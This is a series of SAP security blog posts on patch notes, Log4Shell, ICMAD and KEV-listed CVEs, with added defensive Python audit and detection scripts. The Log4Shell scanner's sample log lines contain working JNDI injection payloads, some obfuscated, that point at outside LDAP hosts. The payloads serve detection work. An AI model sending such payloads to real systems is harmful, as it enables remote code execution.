Layer Seven Security

Monitoring SuccessFactors with SAP Solution Manager

SuccessFactors is a cloud SaaS solution from SAP for Human Capital Management. It includes a suite of applications for core HR functions such as employee management, recruitment, and payroll. It is often closely integrated with HCM functions in cloud or on-premises ERP systems using the Integration Add-On for SAP ERP HCM. The integration can be performed using SAP Integration Suite, Process Integration, or FTP/SFTP.

Similar to other cloud services such as SAP Cloud Platform, SAP Ariba, and SAP Concur, organizations can monitor SuccessFactors with SAP Solution Manager. Solution Manager includes metrics and alerts to monitor interfaces, scheduled jobs and application logs in SuccessFactors including Employee Central and Talent Management. It also supports monitoring for all integration scenarios between SuccessFactors and SAP ERP HCM. The scenarios are outlined in the diagram below.

Monitoring for cloud services including SuccessFactors can be configured using SAP Solution Manager Configuration – Managed Systems Configuration – Cloud Services Tab – Create Cloud Service. For the root URL, refer to SAP Note 2215682 – SuccessFactors API URLs for different Data Centers.

The second step is to create the endpoint for the cloud service. For SuccessFactors, you can create HTTPS and SFTP endpoints, depending on the integration scenario. Both endpoint types require an SFAPI user in SuccessFactors. For more information, refer to note 2161909 – How to enable SFAPI in SuccessFactors. The TLS certificates of the cloud endpoints can be imported into the relevant PSE using STRUST. For a successful TLS handshake, the profile parameters icm/HTTPS/client_sni_enabled and ssl/client_sni_enabled should be set to TRUE in Solution Manager, since the cloud endpoints rely on Server Name Indication to present the correct certificate.

Alerts for SuccessFactors can be enabled via SOLMAN_SETUP – Application Operations – Exception Management. SAP Solution Manager supports monitoring for the following log stores in SuccessFactors:

SuccessFactors Data Replication Errors
SuccessFactors Integration
SuccessFactors API
SuccessFactors Scheduled Jobs
SuccessFactors Simple Integration
SuccessFactors Smart Suite

Filter definitions for log stores can be used to customize monitoring. You can add, remove or change filter fields and values. You can also use different operators for filter values.

SuccessFactors alerts can also be enabled using Interface and Connection Monitoring (ICMon) in Solution Manager. The monitoring templates for Cloud (SuccessFactors) or Web Services ABAP can be used to monitor exceptions in communication channels between the SAP SuccessFactors Integration Add-On in SAP ERP and SAP Cloud Integration. This enables alerts for areas such as Employee Data, Compensation, Recruiting, Onboarding, and Variable Pay. SuccessFactors alerts are automatically integrated with the Cybersecurity Extension for SAP and the SIEM Integrator for SAP.

SAP Security Notes, February 2022

The central note 3131047 was updated with the addition of security notes 3142773 and 3139893 for the critical remote code execution vulnerability in the Apache Log4J 2 component. The new notes patch Log4Shell in SAP Commerce and SAP Dynamic Authorization Management and include manual procedures to apply both patches and workarounds.

Note 3140940 patches a code injection vulnerability in SAP Solution Manager due to missing segregation of duties in Root Cause Analysis (RCA) Tools. RCA supports central diagnostics and monitoring for SAP systems. Users with admin privileges are able to browse files and execute code through connected Diagnostics Agents. The note references note 3145008 for downloading the latest version of LM_SERVICE that contains the fix. It also references note 3137764 for removing links to the vulnerable applications.

Note 3140587 addresses a high-risk SQL injection vulnerability in the Workplace Server of NetWeaver Application Server ABAP. Note 3123427 provides a fix for an HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server Java.

CISA, FBI Warn Organizations to Protect Against State-Sponsored Malware

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint statement to advise organizations to prepare for increased cyber activity in the wake of the Russian invasion of Ukraine. According to the advisory, there is a risk that Russian cyber attacks will spread to government and business networks in the US and other NATO countries as a result of the growing international support for Ukraine and anticipated retaliation for sanctions imposed on Russia.

Threat actors deployed destructive malware against organizations in Ukraine in the lead-up to the invasion. This included the wipers WhisperGate and HermeticWiper, designed to permanently corrupt data on infected hosts, rendering them unbootable. Both strains of malware masquerade as ransomware but have no decryption or data-recovery capabilities.

In response, CISA and the FBI urge all organizations to adopt a heightened posture towards cybersecurity and protecting their critical assets. Specifically, organizations are advised to secure remote access to networks, patch software to address known vulnerabilities, limit the attack surface by disabling unnecessary ports and services, and monitor, detect and respond to potential intrusions.

During this time of heightened risk, organizations can license the Cybersecurity Extension for SAP from Layer Seven Security free of charge for up to three months. According to Ian Thomson, Chief Operating Officer at Layer7, “Layer Seven Security is committed to supporting organizations in protecting their crucial SAP assets during this critical period. Our flagship solution, the Cybersecurity Extension for SAP, will be provided to customers without charge to help them secure mission-critical SAP applications and infrastructure from advanced persistent threats”.

The Cybersecurity Extension for SAP is an SAP-certified add-on for SAP Solution Manager. It implements leading-edge vulnerability management for SAP applications, databases, hosts and components, including application gateways such as the SAProuter and Web Dispatcher. It integrates with System Recommendations for detecting and managing the lifecycle of SAP security notes. The solution identifies vulnerabilities in custom ABAP code and monitors event logs in SAP systems to detect and alert for over 600 indicators of compromise. The solution also applies advanced anomaly detection powered by SAP HANA to detect unusual system and user behavior.

Contact Layer Seven Security using the link below to discuss licensing the Cybersecurity Extension for SAP free of charge to secure your SAP applications.

Security Advisory for Critical SAP ICMAD Vulnerabilities

International threat intelligence agencies including the U.S. Cybersecurity & Infrastructure Security Agency (CISA) and the Computer Emergency Response Team for the EU (CERT-EU) issued security advisories last week for critical vulnerabilities in the SAP Internet Communication Manager (ICM). The ICM handles inbound and outbound HTTP(S) communication for SAP systems. It is a standard component of the NetWeaver Application Server ABAP and Java and of the SAP Web Dispatcher.

The advisories relate to CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533, labelled ICMAD (Internet Communication Manager Advanced Desync). The most critical is CVE-2022-22536: a memory corruption vulnerability that can be exploited through a single HTTP request to fully compromise SAP systems, remotely and without authentication. This impacts AS ABAP and the Web Dispatcher when they are accessed through an HTTP gateway. For AS ABAP, the gateway could be the Web Dispatcher. The vulnerability does not impact direct access to SAP application servers. CVE-2022-22532 impacts AS Java only. This vulnerability has a lower CVSS than CVE-2022-22536 due to a higher attack complexity, but ranks high in terms of impact to Confidentiality, Integrity, and Availability. CVE-2022-22533 is for a lower priority denial of service vulnerability in AS Java triggered by requests that exhaust Memory Pipes (MPI) used for communicating between the ICM and work processes in application servers.

There is evidence of active scanning for ICMAD. SAP systems exposed to the Internet are especially vulnerable. External-facing Web Dispatchers are equally vulnerable. Consequently, it is critical to apply the relevant security notes to patch SAP systems against ICMAD.

Note 3123396 patches AS ABAP and the Web Dispatcher for CVE-2022-22536. SAP Kernels and Web Dispatchers should be updated to the minimum patch levels detailed in the note. If the patches cannot be implemented at short notice, the workaround detailed in note 3137885 can be applied as a stop-gap measure: set the profile parameter wdisp/additional_conn_close to TRUE on the Web Dispatcher. The workaround itself requires a minimum Web Dispatcher patch level, also listed in 3137885, so check the installed version before relying on it. For more details, refer to note 3138881.

Note 3123427 patches AS Java for CVE-2022-22532 and CVE-2022-22533. The workaround recommended in the note can be applied using the parameter setting icm/handle_http_pipeline_requests=FALSE if support for HTTP pipeline requests is not required.
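The profile parameters named on this page (the SNI settings for Solution Manager cloud endpoints in the SuccessFactors article, and the ICMAD workarounds wdisp/additional_conn_close and icm/handle_http_pipeline_requests above) are all plain profile entries, so a single check can verify them. The script below is an added example, not SAP's code and not part of any Layer Seven product: it parses DEFAULT.PFL and an instance profile, lets the instance profile override DEFAULT, and reports each expected parameter as ok, weak or unset. The sample profiles are constructed; the accepted boolean spellings and the absence of a start profile or dynamic RZ11 changes are assumptions.

```python
"""Audit SAP profile files for the parameter settings named on this page.
Added example; not SAP's code and not a substitute for applying the notes."""
import re

# A profile assignment: "parameter = value". Parameter names may contain '/'.
_ASSIGN = re.compile(r"^\s*([A-Za-z0-9_/.\-]+)\s*=\s*(.*?)\s*$")

def parse_profile(text):
    """Return {parameter: value} for one profile file. Lines starting with '#'
    are comments; when a parameter appears twice the last line wins."""
    params = {}
    for raw in text.splitlines():
        if raw.lstrip().startswith("#") or not raw.strip():
            continue
        m = _ASSIGN.match(raw)
        if m:
            params[m.group(1)] = m.group(2)
    return params

def effective_parameters(default_profile, instance_profile):
    """Merge DEFAULT.PFL with the instance profile. The instance profile
    overrides DEFAULT (assumption: no start profile, no dynamic RZ11 changes)."""
    merged = parse_profile(default_profile)
    merged.update(parse_profile(instance_profile))
    return merged

_TRUE = ("true", "1", "on", "yes")     # boolean spellings (assumption)
_FALSE = ("false", "0", "off", "no")

def as_bool(value):
    """True/False for a recognised boolean spelling, None for anything else."""
    v = value.strip().lower()
    if v in _TRUE:
        return True
    if v in _FALSE:
        return False
    return None

# Expected values per system role, taken from the notes quoted on this page.
CHECKS = {
    "webdispatcher": [("wdisp/additional_conn_close", True)],       # note 3137885, CVE-2022-22536
    "java":          [("icm/handle_http_pipeline_requests", False)],  # note 3123427, CVE-2022-22532
    "solman":        [("ssl/client_sni_enabled", True),              # SNI for outbound TLS to cloud endpoints
                      ("icm/HTTPS/client_sni_enabled", True)],
}

def audit(params, role):
    """Map each expected parameter to 'ok', 'weak' (wrong or unrecognised value)
    or 'unset' (absent from the profiles, so the kernel default applies and
    must be confirmed in RZ11 or with sapcontrol ParameterValue)."""
    result = {}
    for name, want in CHECKS[role]:
        if name not in params:
            result[name] = "unset"
        else:
            result[name] = "ok" if as_bool(params[name]) == want else "weak"
    return result

# Constructed sample profiles (not from a real system).
SAMPLE_DEFAULT = """\
# DEFAULT.PFL (constructed sample)
SAPSYSTEMNAME = WD1
icm/handle_http_pipeline_requests = TRUE
"""
SAMPLE_INSTANCE = """\
# Instance profile (constructed sample): overrides DEFAULT.PFL
icm/handle_http_pipeline_requests = FALSE
wdisp/additional_conn_close = false
icm/server_port_0 = PROT=HTTP,PORT=8000
"""

if __name__ == "__main__":
    params = effective_parameters(SAMPLE_DEFAULT, SAMPLE_INSTANCE)
    for role in CHECKS:
        print(role, audit(params, role))
```

Treat "unset" as a finding to verify rather than a pass: the kernel default for a parameter depends on the patch level, and the workaround only matters until the minimum patch level from the note is installed.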

The Cybersecurity Extension for SAP discovers vulnerable ABAP, Java and Web Dispatcher installations that have not been successfully patched for ICMAD. It also identifies missing or incorrectly applied workarounds if the corrections in notes 3123396 and 3123427 have not been applied. The SAP-certified solution performs over 1800 checks for known vulnerabilities in SAP applications and components and supporting databases and operating systems.

SAP Security Notes, January 2022

Multiple Hot News notes were released in January as part of SAP’s continued efforts to patch solutions impacted by the critical Log4Shell vulnerability. This includes Process Orchestration (note 3130521), Data Intelligence (3130920) and Business One (3131740). The central note 3131047 consolidates patches for the remote code execution vulnerability in the vulnerable Apache Log4j 2 component.

Note 3112928 deals with reflected cross-site scripting and code injection vulnerabilities in S/4HANA. The solution implements checks for malicious file uploads or downloads using the SAP Virus Scan Interface (VSI). VSI provides an interface for third party anti-virus software to protect against the import of malicious code into SAP systems.

Note 3123196 was updated for a high priority OS code injection vulnerability in specific methods of a utility class in SAP NetWeaver Application Server ABAP. Malicious code can be injected using transaction SE24 (Class Builder) or SE80 (Object Navigator). Exploitation of the vulnerability requires permissions for authorization object S_DEVELOP with values CLAS and 16 for fields OBJTYPE and ACTVT, respectively. Therefore, restricting access to these permissions also mitigates the vulnerability.
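A check for the mitigation named above, as an added example (not SAP's or the page's own code): which users hold an S_DEVELOP authorization granting OBJTYPE = CLAS and ACTVT = 16. The input shape (a user to authorization-instance map, as you would build it from AGR_USERS with AGR_1251 or UST12 exports) and the simplified value semantics are assumptions; the sample users are constructed. The point the example makes is that field values are combined only within one authorization instance, so a user whose CLAS and 16 values sit in different instances does not hold the permission.

```python
"""Find users whose S_DEVELOP authorizations grant OBJTYPE=CLAS, ACTVT=16.
Added example; not SAP code. Input is a flattened user -> authorization
instances map built from AGR_USERS and AGR_1251 or UST12 (assumption)."""

def value_matches(low, high, value):
    """SAP authorization value semantics (simplified, assumption):
    '*' alone matches everything, a trailing '*' is a prefix pattern,
    and a non-empty HIGH turns LOW..HIGH into an inclusive string range."""
    if high:
        return low <= value <= high
    if low == "*":
        return True
    if low.endswith("*"):
        return value.startswith(low[:-1])
    return value == low

def authorization_grants(auth, required):
    """One authorization instance (field -> list of (LOW, HIGH)) grants the
    request only if every required field matches within that same instance."""
    return all(
        any(value_matches(low, high, wanted) for low, high in auth.get(field, []))
        for field, wanted in required.items()
    )

def users_who_can_exploit(user_auths, required):
    """Users holding at least one S_DEVELOP instance that grants `required`."""
    return sorted(
        user for user, instances in user_auths.items()
        if any(authorization_grants(inst, required) for inst in instances)
    )

# The permission named in the note text: S_DEVELOP with CLAS / 16 (Execute).
REQUIRED = {"OBJTYPE": "CLAS", "ACTVT": "16"}

# Constructed sample users and their S_DEVELOP instances.
SAMPLE_USERS = {
    "DEVELOPER1": [{"OBJTYPE": [("*", "")], "ACTVT": [("*", "")], "OBJNAME": [("Z*", "")]}],
    "DEVELOPER2": [{"OBJTYPE": [("PROG", "")], "ACTVT": [("01", "03"), ("16", "")]}],   # no CLAS
    "DISPLAY1":   [{"OBJTYPE": [("CLAS", "")], "ACTVT": [("03", "")]}],                 # display only
    "BASIS1":     [{"OBJTYPE": [("CLAS", "")], "ACTVT": [("01", "02"), ("16", "")]}],
    # CLAS and 16 live in two different instances: fields are not combined across them.
    "AUDITOR1":   [{"OBJTYPE": [("*", "")], "ACTVT": [("03", "")]},
                   {"OBJTYPE": [("FUGR", "")], "ACTVT": [("16", "")]}],
}

if __name__ == "__main__":
    print(users_who_can_exploit(SAMPLE_USERS, REQUIRED))
```

Run the same check against the transport and quality systems too: the note concerns SE24 and SE80, which are normally locked in production but routinely open in development systems that hold the same custom code.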


Whitepaper: Securing SAP Solutions from Log4Shell

Log4Shell is one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility. A dangerous zero-day remote code execution vulnerability in Log4J was reported in November last year. The vulnerability was patched in December and published in the National Vulnerability Database on December 12 as CVE-2021-44228.

Log4Shell was added to the Known Exploited Vulnerabilities (KEV) Catalog by the Cybersecurity and Infrastructure Security Agency (CISA) due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Iran, Russia and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is bundled in multiple SAP solutions including products such as SAP HANA and SAP Process Orchestration. Download the new whitepaper from Layer Seven Security to learn how to mitigate and detect Log4Shell in SAP applications. The whitepaper includes a detailed breakdown of the vulnerability, guidance for patching and securing SAP solutions, and recommendations for detecting Log4Shell signatures and indicators of compromise.


SAP Security Notes, December 2021

The central security note 3131047 consolidates Log4Shell patches for SAP products. Log4Shell is regarded as one of the most dangerous security vulnerabilities in decades. It can be exploited remotely with minimal complexity and without authentication to execute arbitrary code that could lead to the complete compromise of vulnerable applications.

Log4Shell impacts Log4J, a widely installed open-source Java logging utility developed and maintained by the Apache Software Foundation. Log4J 2 versions 2.14.1 and lower support message lookup substitution via the Java Naming and Directory Interface (JNDI) API. Message lookup substitutions are used to modify the Log4J configuration with dynamic values. The default setting for the JNDI lookup in these versions allows values to be retrieved from remote sources.

A zero-day Remote Code Execution (RCE) vulnerability impacting the message lookup feature via JNDI in Log4J was discovered and reported by security researchers to the Apache Foundation on November 24, 2021. The vulnerability was patched by Apache on December 6 and published in the National Vulnerability Database on December 12 as CVE-2021-44228, also known as Log4Shell. A proof of concept (PoC) for the vulnerability was published on GitHub. CVE-2021-44228 has the maximum possible CVSS score of 10.0/10.0. The attack complexity is classified as low, requiring no privileges or user interaction.

Log4J is bundled in multiple SAP solutions. As of December 26, 2021, SAP had provided patches for products including SAP HANA XS Advanced (XSA) Runtime and XSA Cockpit, Process Orchestration, and Landscape Management. Patches were pending for multiple solutions including SAP Business One, Commerce, PowerDesigner, and Web IDE for HANA. Workarounds are provided for some of the unpatched solutions via Knowledge Base Articles (KBA).


Securing SAP Systems from Log4J Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has designated the recent Log4J vulnerability as one of the most serious in decades and urged organizations to immediately address the vulnerability in applications.  

Log4j is an open-source logging framework maintained by the Apache Foundation. Log4j 2 supports lookups through the Java Naming and Directory Interface (JNDI) API: when message lookup substitution is enabled, an attacker-controlled string that reaches a log message, such as ${jndi:ldap://host/object}, makes Log4J query the attacker's LDAP or other directory server, fetch a serialized Java object or a reference to a remote class, and execute it during deserialization or class loading. This can lead to the complete compromise of impacted applications and systems. The remote code execution vulnerability impacts all versions of Log4J 2 up to and including 2.14.1 in Java 8 or higher.

Message lookup substitution is disabled by default in Log4j 2.15.0 and has been removed altogether from 2.16.0. Therefore, customers should upgrade to the latest version of Log4J. The vulnerability is tracked as CVE-2021-44228 with a base CVSS score of 10.0.

CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog due to evidence of widespread active exploitation of the vulnerability by multiple threat actors. This includes nation state groups originating from China, Russia, Iran, and North Korea. According to some reports, threat actors are exploiting the vulnerability to deploy ransomware payloads or to gain access to target networks. The access is then brokered to other threat actors.

Log4J is included in multiple SAP applications including SAP HANA XSA. The central note 3131047 includes available patches for impacted solutions. Refer to SAP's official response for details of all impacted products. Note 3129883 includes manual procedures for a workaround that disables the loading of external code in Log4J using the J2EE Config Tool.

The Cybersecurity Extension for SAP identifies vulnerable SAP systems that have not been patched for the Log4J vulnerability. It also detects and alerts for suspected exploits targeted against SAP Java and Web Dispatcher installations based on exploit signatures. This includes known obfuscations and bypass methods.
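The JNDI lookup path described in the two Log4Shell articles above, and the obfuscated variants that the detection section mentions, as an added example (not the page's code and not the Cybersecurity Extension's signatures): a normaliser that percent-decodes a request and collapses Log4j lookup nesting inside-out, resolving the ${lower:}, ${upper:} and ${key:-default} forms that attackers use to hide the literal string jndi, followed by a scan over HTTP log lines. The sample lines, addresses and the CLF-like layout are constructed; the set of obfuscations handled is an assumption, and unknown lookups are left as text so that a resolved jndi: still surfaces.

```python
"""Normalise Log4j lookup obfuscations and flag JNDI lookups in HTTP log lines.
Added example for this page; not part of any SAP or Layer Seven tool."""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested lookup inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What a resolved Log4Shell payload looks like once the braces are gone: jndi:<scheme>:
_JNDI = re.compile(r"jndi\s*:\s*[a-z]+\s*:", re.IGNORECASE)

def _resolve(body):
    """Resolve one lookup body the way Log4j 2.x substitution would, for the
    obfuscations commonly seen in the wild (assumption: only these forms)."""
    if ":-" in body:                        # ${prefix:key:-default} -> default
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if sep and head.lower() == "upper":     # ${upper:j} -> J
        return rest.upper()
    return body                             # unknown lookup: keep the text

def normalize(text, max_rounds=20):
    """Percent-decode (bounded, for double encoding), then collapse nested
    lookups from the inside out until none is left or the round limit is hit."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

def scan(lines):
    """Return (line_index, resolved_indicator) for every line that contains a
    JNDI lookup once obfuscation is stripped."""
    hits = []
    for i, line in enumerate(lines):
        resolved = normalize(line)
        m = _JNDI.search(resolved)
        if m:
            hits.append((i, resolved[m.start():m.start() + 60]))
    return hits

# Constructed sample lines in a CLF-like layout (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /sap/bc/ping HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:09 +0000] "GET /index.html HTTP/1.1" 404 0 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:03:40 +0000] "GET /sap/public/ping?x='
    '%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.8%2Fa%7D HTTP/1.1" 200 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:14:04:02 +0000] "GET / HTTP/1.1" 200 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/x}"',
    '198.51.100.4 - - [10/Dec/2021:14:05:17 +0000] "GET /sap/bc/gui/sap/its/webgui?~transaction=SU01 '
    'HTTP/1.1" 200 0 "-" "SAP NetWeaver Application Server"',
]

if __name__ == "__main__":
    for index, indicator in scan(LOG_LINES):
        print(f"line {index}: {indicator}")
```

A hit in the access log proves only that a probe arrived, not that it fired; a log line of an unpatched Log4j instance that contains the same payload, followed by an outbound LDAP or HTTP connection from the Java host to the address in the payload, is the combination that indicates exploitation.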

SAP Security Notes, November 2021

Hot news note 3089831 was updated for a SQL Injection vulnerability in the SAP NZDT Mapping Table Framework. SAP NZDT (Near Zero Downtime Technology) is a service that supports system conversion with minimal downtime. The vulnerability could enable attackers to access backend databases by executing malicious queries or inject code through vulnerable NZDT function modules. The automatic corrections applied through the note deactivate some of the affected function modules and deactivate the import parameter for the others. As a result, the SAP Test Data Migration Server will no longer be usable after applying the fix. A workaround is included in the note if the fix cannot be applied. This blocks external calls to the relevant function modules using Unified Connectivity (UCON). However, the function modules may still be called by local users with sufficient privileges.

Hot news note 3099776 patches a missing authorization check in the ABAP Platform Kernel. The vulnerability could be exploited to escalate privileges and access connected systems through RFC or HTTP connections. The recommended SP Stack Kernels in the note should be installed to apply a TCODE check that addresses the vulnerability.

Note 2827086 provides corrections for multiple vulnerabilities affecting SAP Forecasting and Replenishment for Retail in SAP Supply Chain Management (SCM). This includes memory corruption and denial of service.

Note 2971638 removes hardcoded credentials for CA Introscope Enterprise Manager in SAP Solution Manager and SAP Focused Run. Manual steps are also included in the note for updating the credentials.

Note 3110328 applies search restrictions to resolve a missing authorization check in the B2B Accelerator of SAP Commerce that could lead to an escalation of privileges.

CISA Issues Directive for Actively Exploited SAP Vulnerabilities

The US Cybersecurity and Infrastructure Security Agency (CISA) issued Binding Operational Directive 22-01 on November 3 to compel government departments and agencies to remediate specific vulnerabilities with known exploits. According to CISA, the vulnerabilities pose a significant risk to information systems. This includes several vulnerabilities for SAP applications that must be remediated by May 3, 2022. Agencies have 60 days to review and update their vulnerability management policies in accordance with the Directive.

The Directive addresses weaknesses with the Common Vulnerability Scoring System (CVSS) used for rating Common Vulnerabilities and Exposures (CVE) in the National Vulnerability Database (NVD). CVSS does not take into account active exploitations for vulnerabilities. Most critical CVEs are highly complex and have no known exploits. The Directive shifts the focus to CVEs with active threats. These vulnerabilities are prioritized for remediation and are classified in the CISA catalog for Known Exploited Vulnerabilities (KEV).

The catalog includes six CVEs for SAP applications.

CVE-2010-5326 is for the invoker servlet, implemented in the InvokerServlet class within the Web Container of the J2EE Engine of SAP NetWeaver Application Server Java (AS Java). The invoker servlet is vulnerable to authentication bypass, enabling remote attackers to execute arbitrary code via HTTP or HTTPS requests. The servlet is disabled by default in higher versions of AS Java. Refer to SAP note 1445998 for disabling the relevant property of the servlet_jsp service on server nodes. SAP also recommends scanning or reviewing application code to identify the use of servlets with the prefix “/servlet/”. Applications should only use local servlets that are defined in their web.xml files, and auth constraints in web.xml are recommended to restrict invocation of the servlet to users with an administrative role.
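The review that the note recommends, as an added example (not SAP's tool and not the page's own code): it parses a web.xml, lists the explicit servlet mappings under /servlet/, and reports whether a security-constraint with an auth-constraint covers that prefix and which roles it names. The two descriptors below are constructed, one without and one with the constraint. A web.xml constraint only covers the application it ships with, so the invoker servlet itself must still be disabled on the server per note 1445998.

```python
"""Scan an AS Java web.xml for servlets reachable under /servlet/ and check
that a security constraint with a role protects that prefix. Added example;
not SAP's code. The sample descriptors are constructed."""
import xml.etree.ElementTree as ET

def _local(tag):
    """Strip the XML namespace; J2EE descriptors usually declare one."""
    return tag.rsplit("}", 1)[-1]

def _find_all(elem, name):
    return [e for e in elem.iter() if _local(e.tag) == name]

def _texts(elem, name):
    return [(e.text or "").strip() for e in _find_all(elem, name)]

def pattern_covers(pattern, path):
    """Servlet-spec URL matching: '/x/*' is a path prefix, '*.ext' an
    extension match, anything else an exact match."""
    if pattern.endswith("/*"):
        base = pattern[:-2]
        return path == base or path.startswith(base + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern

def audit_web_xml(xml_text, prefix="/servlet/"):
    """Return the servlet mappings under `prefix`, whether a constraint with an
    auth-constraint covers the prefix, and the roles that constraint names."""
    root = ET.fromstring(xml_text)
    mappings = []
    for sm in _find_all(root, "servlet-mapping"):
        name = (_texts(sm, "servlet-name") or ["?"])[0]
        for pattern in _texts(sm, "url-pattern"):
            if pattern.startswith(prefix):
                mappings.append((name, pattern))
    protected, roles = False, set()
    for sc in _find_all(root, "security-constraint"):
        has_auth = bool(_find_all(sc, "auth-constraint"))
        covers = any(pattern_covers(p, prefix + "AnyServlet")
                     for p in _texts(sc, "url-pattern"))
        if has_auth and covers:            # an empty auth-constraint denies everyone
            protected = True
            roles.update(_texts(sc, "role-name"))
    return {"servlet_mappings": mappings,
            "servlet_prefix_protected": protected,
            "roles": sorted(roles)}

# Constructed descriptor: explicit servlet under /servlet/, no constraint.
WEAK_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <servlet>
    <servlet-name>Report</servlet-name>
    <servlet-class>com.example.ReportServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>Report</servlet-name>
    <url-pattern>/servlet/Report</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Constructed descriptor: same servlet, /servlet/* limited to an admin role.
HARDENED_WEB_XML = WEAK_WEB_XML.replace("</web-app>", """\
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>servlets</web-resource-name>
      <url-pattern>/servlet/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrators</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>""")

if __name__ == "__main__":
    print(audit_web_xml(WEAK_WEB_XML))
    print(audit_web_xml(HARDENED_WEB_XML))
```

Servlets invoked as /servlet/<class name> without a servlet-mapping entry will not appear in the mapping list at all; their absence from web.xml while the path is used in the application's links or code is exactly the invoker-servlet usage the note asks you to find.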

CVE-2016-3976 relates to a directory traversal vulnerability in AS Java that could be exploited to read arbitrary files from servers remotely and without authentication using CrashFileDownloadServlet. Note 2234971 provides a patch for the LM-CORE to address the CVE.

CVE-2020-6287 is for the RECON vulnerability in the LM Configuration Wizard of AS Java. Attackers can exploit a missing authentication check in the CTCWebService to perform administrative functions such as creating privileged users. Note 2934135 patches the missing authentication check in the LM Configuration Wizard.

CVE-2018-2380 relates to a directory traversal vulnerability in SAP CRM.  There is a publicly-available exploit for the CVE that could be deployed to perform remote code execution through log file injection. Note 2547431 includes a patch to validate user input for log paths and block arbitrary log file locations and extensions.

CVE-2016-9563 is for a Denial of Service vulnerability in a BPM service within AS Java. This CVE also has a publicly-available exploit. Note 2296909 disables the resolving of external entities during XML parsing to address the CVE.

CVE-2020-6207 relates to a missing authentication check for the SAP EEM servlet in SAP Solution Manager. A module for the Metasploit penetration testing framework automates the exploitation of the CVE. It could be exploited to execute OS commands on connected SMDAgents via the /EemAdminService/EemAdmin page for User Experience Monitoring. Note 2890213 includes a patch for the impacted LM-SERVICE software component and instructions for a temporary workaround involving enabling authentication for the EemAdmin service in the Java stack of Solution Manager.

The Cybersecurity Extension for SAP is an SAP-certified solution that automates the discovery of applications vulnerable to the CVEs for SAP applications in the KEV catalog. It also monitors SAP logs to detect the signature of exploits targeting the CVEs and provides mechanisms to investigate and respond to the exploits.